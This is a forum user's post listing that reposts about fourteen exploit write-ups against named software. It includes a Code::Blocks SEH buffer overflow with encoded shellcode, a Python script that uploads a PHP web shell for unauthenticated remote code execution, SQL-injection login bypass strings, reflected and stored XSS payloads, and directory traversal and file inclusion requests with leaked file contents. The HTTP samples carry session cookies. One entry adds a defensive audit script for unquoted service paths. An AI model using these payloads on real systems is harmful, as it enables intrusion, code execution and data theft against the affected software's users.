HireHackking

Everything posted by HireHackking

  1. # Exploit Title: Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path
     # Exploit Author: Bobby Cooke
     # Date: 2020-07-15
     # Vendor Site: https://www.10-strike.com/
     # Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
     # Tested On: Windows 10 - Pro 1909 (x86)
     # Version: Version 3.9
     # Vulnerability Type:
     #   Local Privilege Escalation to LocalSystem by Unquoted Service Path.
     # Vulnerability Description:
     #   The 10-Strike Bandwidth Monitor v3.9 services "Svc10StrikeBandMontitor", "Svc10StrikeBMWD", and "Svc10StrikeBMAgent" suffer
     #   from unquoted service path vulnerabilities that allow attackers to achieve Privilege Escalation to SYSTEM, at startup,
     #   by placing a malicious binary in the truncated service path, such as "C:\Program.exe".

     C:\Users\boku>wmic service get name,pathname,startmode,StartName | findstr "10-Strike Bandwidth Monitor"
     Svc10StrikeBandMonitor  C:\Program Files\10-Strike Bandwidth Monitor\BMsvc.exe          Auto  LocalSystem
     Svc10StrikeBMWD         C:\Program Files\10-Strike Bandwidth Monitor\BMWDsvc.exe        Auto  LocalSystem
     Svc10StrikeBMAgent      C:\Program Files\10-Strike Bandwidth Monitor Agent\BMAgent.exe  Auto  LocalSystem
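The post above relies on reading wmic output by eye. The following is an added example, not part of the post or of 10-Strike's software: a small audit script that parses rows in the layout of that wmic query, reports which LocalSystem services have an unquoted image path with spaces, lists the intermediate paths Windows would try first (the ones whose parent directories an administrator must confirm are not writable by standard users), and produces the quoted form that fixes the finding. The sample rows are constructed; the three 10-Strike rows mirror the post, and GoodSvc is invented as a correctly quoted control.

```python
import re
from typing import Dict, List

# Constructed sample in the layout of the wmic query above: the three
# 10-Strike rows quoted in the post plus one correctly quoted control row
# (GoodSvc is invented for contrast). Columns are separated by two or more spaces.
SAMPLE_WMIC_OUTPUT = """\
Svc10StrikeBandMonitor  C:\\Program Files\\10-Strike Bandwidth Monitor\\BMsvc.exe  Auto  LocalSystem
Svc10StrikeBMWD  C:\\Program Files\\10-Strike Bandwidth Monitor\\BMWDsvc.exe  Auto  LocalSystem
Svc10StrikeBMAgent  C:\\Program Files\\10-Strike Bandwidth Monitor Agent\\BMAgent.exe  Auto  LocalSystem
GoodSvc  "C:\\Program Files\\Good Vendor\\good.exe" -service  Auto  LocalSystem
"""

# Splits an image path into "<...>.exe" and whatever arguments follow it.
EXE_RE = re.compile(r"(.*?\.exe)\b(.*)", re.IGNORECASE)


def truncation_candidates(pathname: str) -> List[str]:
    """Paths CreateProcess tries, in order, before the real image when an
    unquoted image path contains spaces. An empty list means the service is
    not affected (quoted path, or no spaces before the .exe)."""
    p = pathname.strip()
    if p.startswith('"'):
        return []
    m = EXE_RE.match(p)
    exe_path = m.group(1) if m else p  # arguments after the .exe do not matter
    if " " not in exe_path:
        return []
    words = exe_path.split(" ")
    # Every space is a split point: "C:\Program Files\X Y\s.exe" ->
    # C:\Program.exe, C:\Program Files\X.exe, ...
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


def audit(wmic_output: str) -> Dict[str, List[str]]:
    """Map service name -> truncation candidates for every unquoted,
    space-containing image path that runs as LocalSystem. Each candidate's
    parent directory must be checked for write access by non-admin users."""
    findings: Dict[str, List[str]] = {}
    for line in wmic_output.splitlines():
        fields = re.split(r"\s{2,}", line.strip())
        if len(fields) < 4:
            continue
        name, pathname, _startmode, account = fields[:4]
        candidates = truncation_candidates(pathname)
        if candidates and account.lower() in ("localsystem", "nt authority\\system"):
            findings[name] = candidates
    return findings


def quoted_binpath(pathname: str) -> str:
    """Remediated form of the image path: the executable wrapped in quotes,
    arguments (if any) left outside them. This is the value an administrator
    would set as the service's binPath."""
    p = pathname.strip()
    m = EXE_RE.match(p)
    if p.startswith('"') or not m:
        return p
    return '"%s"%s' % (m.group(1), m.group(2))


if __name__ == "__main__":
    for svc, cands in audit(SAMPLE_WMIC_OUTPUT).items():
        print(svc)
        for c in cands:
            print("   verify directory ACL for:", c)
```

On a real host, feed the script the output of the same wmic query (or `Get-CimInstance Win32_Service`) and then check the ACL of each candidate's parent directory; a finding is only exploitable where a standard user can create files there.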
  2. # Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection
     # Exploit Author: BLAY ABU SAFIAN (Inveteck Global)
     # Website: https://github.com/olotieno/College-Management-System-Php
     # Date: 2020-06-16
     # Google Dork: N/A
     # Vendor: https://github.com/olotieno/
     # Software Link: https://github.com/olotieno/College-Management-System-Php.git
     # Affected Version: N/A
     # Patched Version: unpatched
     # Category: Web Application
     # Tested on: MAC

     The College Management System Php suffers from SQL injection vulnerabilities in the index.php page:

     $msg="";
     if(isset($_POST['btn_log'])){
         $uname=$_POST['unametxt'];
         $pwd=$_POST['pwdtxt'];
         $sql=mysqli_query($con,"SELECT * FROM users_tbl WHERE username='$uname' AND password='$pwd'");

     SQL injection vulnerability: in file index.php, data from the POST parameters 'unametxt' and 'pwdtxt' is not filtered before being passed into the SQL query, hence the SQL injection vulnerability.

     Payload: ' or 1=1 --

     Thank you
     Regards
     Abu Safian Blay
     https://inveteckglobal.com
  3. # Exploit Title: OpenCTI 3.3.1 - Directory Traversal
     # Date: 2020-03-05
     # Exploit Author: Raif Berkay Dincel
     # Vendor Homepage: www.opencti.io/
     # Software [https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1]
     # Version: [3.3.1]
     # CVE-ID: N/A
     # Tested on: Linux Mint / Windows 10
     # Vulnerabilities Discovered Date : 2020/03/05 [YYYY/MM/DD]

     # As a result of the research, two vulnerabilities were identified. (Directory Traversal & Cross Site Scripting [XSS])
     # Technical information is provided below step by step.

     # [1] - Directory Traversal Vulnerability
     # Vulnerable Parameter Type: GET
     # Vulnerable Parameter: TARGET/static/css/[Payload]

     # Proof of Concepts:
     https://TARGET/static/css//../../../../../../../../etc/passwd

     # HTTP Request:
     GET /static/css//../../../../../../../../etc/passwd HTTP/1.1
     Host: TARGET
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Connection: close
     Cookie: connect.sid=s%3ATkG_XOPI-x4FclzoLAZvx_oBEHaTkG4N.kwp3h9LAyBrG03SzzT8ApZu0CRaUwI5CP7yizXTerYM; opencti_token=df8635b1-39b5-41c2-8873-2f19b0e6ca8c
     Upgrade-Insecure-Requests: 1

     # HTTP Response
     HTTP/1.1 200 OK
     X-DNS-Prefetch-Control: off
     X-Frame-Options: SAMEORIGIN
     Strict-Transport-Security: max-age=15552000; includeSubDomains
     X-Download-Options: noopen
     X-Content-Type-Options: nosniff
     X-XSS-Protection: 1; mode=block
     Content-Type: text/css; charset=utf-8
     ETag: W/"500-eiHlcjY0lWovE9oQsRof3WWtG1o"
     Vary: Accept-Encoding
     Date: Sun, 03 May 2020 01:25:21 GMT
     Connection: close
     Content-Length: 1280

     root:x:0:0:root:/root:/bin/ash
     bin:x:1:1:bin:/bin:/sbin/nologin
     daemon:x:2:2:daemon:/sbin:/sbin/nologin
     adm:x:3:4:adm:/var/adm:/sbin/nologin
     lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
     sync:x:5:0:sync:/sbin:/bin/sync
     shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
     halt:x:7:0:halt:/sbin:/sbin/halt
     mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
     news:x:9:13:news:/usr/lib/news:/sbin/nologin
     uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
     operator:x:11:0:operator:/root:/sbin/nologin
     man:x:13:15:man:/usr/man:/sbin/nologin
     postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
     cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
     ftp:x:21:21::/var/lib/ftp:/sbin/nologin
     sshd:x:22:22:sshd:/dev/null:/sbin/nologin
     at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
     squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
     xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
     games:x:35:35:games:/usr/games:/sbin/nologin
     postgres:x:70:70::/var/lib/postgresql:/bin/sh
     cyrus:x:85:12::/usr/cyrus:/sbin/nologin
     vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
     ntp:x:123:123:NTP:/var/empty:/sbin/nologin
     smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
     guest:x:405:100:guest:/dev/null:/sbin/nologin
     nobody:x:65534:65534:nobody:/:/sbin/nologin
     node:x:1000:1000:Linux User,,,:/home/node:/bin/sh

     # [2] - Cross Site Scripting (XSS) Vulnerability
     # Vulnerable Parameter Type: GET
     # Vulnerable Parameter: TARGET/graphql?[Payload]

     # Proof of Concepts:
     TARGET/graphql?'"--></style></scRipt><scRipt>alert('Raif_Berkay')</scRipt>
     https://TARGET/graphql?%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%27Raif_Berkay%27)%3C/scRipt%3E

     # HTTP Request:
     GET /graphql?'"--></style></scRipt><scRipt>alert('Raif_Berkay')</scRipt> HTTP/1.1
     Host: TARGET
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
     Accept-Encoding: gzip, deflate
     Accept-Language: en-us,en;q=0.5
     Cache-Control: no-cache
     Cookie: opencti_token=2b4f29e3-5ea8-4890-8cf5-a76f61f1e2b2; connect.sid=s%3AB8USExilsGXulGOc09fo92piRjpWNtUo.GZ9pmhOf7i1l78t%2BHVk9zh9AQ9BTO%2BHvCRix3iXv6iw
     User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  4. # Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)
     # Vendor Homepage: http://www.codeblocks.org/
     # Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download
     # Exploit Author: Paras Bhatia
     # Discovery Date: 2020-06-16
     # Vulnerable Software: Code Blocks
     # Version: 17.12
     # Vulnerability Type: Local Buffer Overflow
     # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

     #Steps to Produce the Crash:
     # 1.- Run python code: codeblocks.py
     # 2.- Copy content to clipboard
     # 3.- Turn off DEP for codeblocks.exe
     # 4.- Open "codeblocks.exe"
     # 5.- Go to "File" > "New" > "Project..."
     # 6.- Click on "Files" from left box > Select "C/C++ header" > Click on "Go" > Click on "Next"
     # 7.- Paste ClipBoard into the "Filename with fullpath:" .
     # 8.- Click on "Finish".
     # 9.- Calc.exe runs.

     #################################################################################################################################################

     #Python "codeblocks.py" Code:

     f= open("codeblocks.txt", "w")

     junk1="A" * 2006

     nseh="\x61\x62"  #popad / align

     #Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\CodeBlocks\codeblocks.exe
     seh="\xe0\x50"

     ven = "\x62"            #align
     ven +="\x53"            #push ebx
     ven += "\x62"           #align
     ven += "\x58"           #pop eax
     ven += "\x62"           #align
     ven += "\x05\x14\x11"   #add eax, 0x11001400
     ven += "\x62"           #align
     ven += "\x2d\x13\x11"   #sub eax, 0x11001300
     ven += "\x62"           #align
     ven += "\x50"           #push eax
     ven += "\x62"           #align
     ven += "\xc3"           #ret

     junk2="\x41" * 108  #required to make sure shellcode = eax

     #msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX
     buf = ""
     buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
     buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
     buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
     buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
     buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
     buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
     buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
     buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
     buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
     buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72"
     buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50"
     buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b"
     buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52"
     buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31"
     buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c"
     buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37"
     buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a"
     buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71"
     buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34"
     buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79"
     buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52"
     buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71"
     buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30"
     buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d"
     buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c"
     buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b"
     buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b"
     buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34"
     buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32"
     buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b"
     buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64"
     buf += "\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30"
     buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66"
     buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78"
     buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d"
     buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70"
     buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52"
     buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43"
     buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53"
     buf += "\x35\x6d\x30\x41\x41"

     junk3 = "\x62" * 5000  #padding to crash

     payload = junk1 + nseh + seh + ven + junk2 + buf + junk3

     f.write(payload)
     f.close()  # the posted script omitted the parentheses, so the file was never flushed
  5. # Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass
     # Google Dork: N/A
     # Exploit Author: Prof. Kailas PATIL (krp)
     # Date: 2020-06-18
     # Vendor Homepage: https://phpgurukul.com/
     # Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/
     # Version: v1.0
     # Category: Webapps
     # Tested on: LAMP for Linux

     # Description:
     # Password and username parameters have sql injection vulnerability in Admin login panel.
     #
     #------------------------------------------------------
     #
     # Login Link: http://localhost/bpms/admin/index.php
     # username: ' or '1'='1'#
     # password: blah123
     #
     #------------------------------------------------------
  6. # Exploit Title: FileRun 2019.05.21 - Reflected Cross-Site Scripting
     # Date: 2019-07-01
     # Exploit Author: Emre ÖVÜNÇ
     # Vendor Homepage: https://www.filerun.com/
     # Software Link: https://filerun.com/download
     # Version: v2019.05.21
     # Tested on: Windows/Linux
     # CVE: CVE-2019-12905

     # CVE-2019-12905
     # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12905
     # https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3

     # PoC
     To exploit vulnerability, someone could upload an allowed file named “><img src=x onerror=prompt(document.domain)> to impact users who open the page.

     POST /filerun/?module=fileman&section=do&page=up HTTP/1.1
     Host: [TARGET]
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
     Accept: */*
     Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Referer: http://172.16.191.129/filerun/
     Content-Type: multipart/form-data; boundary=---------------------------142096305821079611661465592403
     Content-Length: 6034
     DNT: 1
     Connection: close
     Cookie: FileRunSID=aqlneuv86ccj3pi4h476faopi5

     -----------------------------142096305821079611661465592403
     Content-Disposition: form-data; name="flowTotalSize"

     5100
     -----------------------------142096305821079611661465592403
     Content-Disposition: form-data; name="flowIsFirstChunk"

     1
     -----------------------------142096305821079611661465592403
     Content-Disposition: form-data; name="flowIsLastChunk"

     1
     -----------------------------142096305821079611661465592403
     Content-Disposition: form-data; name="flowFilename"

     “><img src=x onerror=prompt(document.domain)>.jpg
     -----------------------------142096305821079611661465592403
     Content-Disposition: form-data; name="path"

     /ROOT/HOME
     -----------------------------142096305821079611661465592403
     Content-Disposition: form-data; name="file"; filename="“><img src=x onerror=prompt(document.domain)>.jpg"
     Content-Type: image/jpg

     <%@ I said you should learn! %>
     -----------------------------142096305821079611661465592403--
  7. # Exploit Title: Student Enrollment 1.0 - Unauthenticated Remote Code Execution
     # Date: 2020-06-22
     # Exploit Author: Selim Enes 'Enesdex' Karaduman
     # Vendor Homepage: https://www.sourcecodester.com/php/14281/online-student-enrollment-system-using-phpmysqli.html
     # Version: 1.0
     # Tested on: Windows 10 / WampServer
     # Usage : python3 exploit.py -u TARGET_URL -c CODE_TO_EXECUTE

     import requests
     import string
     import random
     import sys
     import getopt

     options, remainder = getopt.gnu_getopt(sys.argv[1:], 'hu:c:')

     for opt, arg in options:
         if opt == '-h':
             print('Usage: python3 exploit.py -u TARGET_URL -c CODE_TO_EXECUTE')
             exit()
         elif opt == '-u':
             url = arg
         elif opt == '-c':
             cmd = arg

     # random account name; the uploaded "photo" is stored under this name with its original extension
     res = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 10))

     session = requests.session()
     burp0_url = url+"/admin/register.php"
     burp0_cookies = {}
     burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.100/student_enrollment/admin/register.php", "Content-Type": "multipart/form-data; boundary=---------------------------5220369311929647034402434351", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
     burp0_data = (
         "-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n" + res +
         "\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"email\"\r\n\r\n" + res + "@gmail.com" +
         "\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n" + res +
         "\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n12345678" +
         "\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"c_password\"\r\n\r\n12345678" +
         "\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"photo\"; filename=\"a.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n$cmd = shell_exec($_GET['cmd']); echo $cmd;\n?>\n" +
         "\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"register\"\r\n\r\n" +
         "\r\n-----------------------------5220369311929647034402434351--\r\n"
     )
     session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

     # the posted script hard-coded http://192.168.1.100/student_enrollment here instead of the -u value
     rce = requests.get(url+"/admin/images/"+res+".php?cmd="+cmd)
     get_code = rce.text
     print("Exploit Author--> Selim Enes 'Enesdex' Karaduman")
     print(get_code)
  8. # Exploit Title: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload
     # Google Dork: N/A
     # Date: 2020-06-20
     # Exploit Author: BKpatron
     # Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip
     # Version: v1.0
     # Tested on: Win 10
     # CVE: N/A

     # Vulnerability: Online Student Enrollment System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.

     #CSRF PoC:
     <html>
       <body>
         <form action="http://localhost/student_enrollment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data">
           <input type="file" name="userphoto" required="" id="photo"><br>
           <input class="btn btn-info" type="submit" name="upphoto" value="Upload Photo">
         </form>
       </body>
     </html>
  9. # Exploit Title: Odoo 12.0 - Local File Inclusion
     # Date: 2019-06-14
     # Exploit Author: Emre ÖVÜNÇ
     # Vendor Homepage: https://www.odoo.com/
     # Software Link: https://www.odoo.com/tr_TR/page/download
     # Version: v12.0
     # Tested on: Windows/Linux

     # https://github.com/EmreOvunc/Odoo-12.0-LFI-Vulnerabilities
     # https://www.odoo.com/security-report

     # PoC-1
     To exploit vulnerability, someone could use 'http://[HOST]:8069/base_import/static/c:/windows/win.ini' request to get some information from the target.

     GET /base_import/static/c:/windows/win.ini HTTP/1.1
     Host: [TARGET]
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     DNT: 1
     Connection: close
     Upgrade-Insecure-Requests: 1

     # PoC-2
     To exploit vulnerability, someone could use 'http://[HOST]:8069/web/static/c:/windows/win.ini' request to get some information from the target.

     GET /web/static/c:/windows/win.ini HTTP/1.1
     Host: [TARGET]
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     DNT: 1
     Connection: close
     Upgrade-Insecure-Requests: 1

     # PoC-3
     To exploit vulnerability, someone could use 'http://[HOST]:8069/base/static/c:/windows/win.ini' request to get some information from the target.

     GET /base/static/c:/windows/win.ini HTTP/1.1
     Host: [TARGET]
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     DNT: 1
     Connection: close
     Upgrade-Insecure-Requests: 1
  10. # Exploit Title: WebPort 1.19.1 - Reflected Cross-Site Scripting
      # Date: 2019-05-30
      # Exploit Author: Emre ÖVÜNÇ
      # Vendor Homepage: https://webport.se/
      # Software Link: https://webport.se/nedladdningar/
      # Version: v1.19.1
      # Tested on: Windows/Linux

      # CVE-2019-12461
      # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461
      # https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS

      # PoC
      To exploit vulnerability, someone could use 'http://[server]:8090/log?type="</script><script>alert('xss');</script><script>' request to impact users who open a maliciously crafted link or third-party web page.

      GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E HTTP/1.1
      Host: [TARGET]
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      DNT: 1
      Connection: close
      Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
      Upgrade-Insecure-Requests: 1
  11. # Exploit Title: WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
      # Date: 2019-05-30
      # Exploit Author: Emre ÖVÜNÇ
      # Vendor Homepage: https://webport.se/
      # Software Link: https://webport.se/nedladdningar/
      # Version: v1.19.1
      # Tested on: Windows/Linux

      # CVE-2019-12460
      # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12460
      # https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS

      # PoC
      To exploit vulnerability, someone could use 'http://[server]:8090/access/setup?type="</script><script>alert('xss');</script><script>' request to impact users who open a maliciously crafted link or third-party web page.

      GET /access/setup?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E HTTP/1.1
      Host: [TARGET]
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      DNT: 1
      Connection: close
      Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
      Upgrade-Insecure-Requests: 1
  12. # Exploit Title: Frigate 2.02 - Denial Of Service (PoC)
      # Vendor Homepage: http://www.frigate3.com/
      # Software Link Download: http://www.frigate3.com/download/Frigate2.exe
      # Exploit Author: Paras Bhatia
      # Discovery Date: 2020-06-22
      # Vulnerable Software: Frigate
      # Version: 2.02
      # Vulnerability Type: Denial of Service (DoS)
      # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

      #Steps to Produce the Crash:
      # 1.- Run python code: FrigateCrash.py
      # 2.- Copy content to clipboard
      # 3.- Open "Frigate2.exe"
      # 4.- Go to "Disk" > "Activate Command Line"
      # 5.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application.
      # 6.- Press Enter from Keyboard.
      # 7.- Click on OK in the dialog box that appears.
      # 8.- Crashed.

      ##################################################################################################################################################

      #Python "FrigateCrash.py" Code:

      f= open("FrigateCrash.txt", "w")
      payload="\x41" * 8000
      f.write(payload)
      f.close()
  13. # Exploit Title: Eaton Intelligent Power Manager 1.6 - Directory Traversal
      # Date: 2018-09-29
      # Exploit Author: Emre ÖVÜNÇ
      # Vendor Homepage: https://powerquality.eaton.com/
      # Software Link: https://powerquality.eaton.com/Support/Software-Drivers/default.asp?cx=-999
      # Version: v1.6
      # Tested on: Windows

      # CVE-2018-12031
      # https://nvd.nist.gov/vuln/detail/CVE-2018-12031
      # https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion

      # PoC
      To exploit vulnerability, someone could use 'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../' request to get some information from the target.

      GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host HTTP/1.1
      Host: [TARGET]
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      DNT: 1
      Connection: close
      Upgrade-Insecure-Requests: 1
  14. # Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection
      # Date: 2020-06-23
      # Exploit Author: Eren Şimşek
      # Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html
      # Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL
      # Version: v1.0
      # Tested on: Linux - Wamp Server

      >Vulnerable File
      /category.php

      >Vulnerable Code
      $id=$_REQUEST['id'];
      $query="SELECT * from blog_categories where id='".$id."'";

      Id parameter enters sql query without any changes

      >Proof Of Concept
      sqlmap 'http://localhost/resblog/category.php?id=1' --dbs --batch

      OR

      http://TARGET/resblog/category.php?id=1'
      Single Quote will cause SQL error
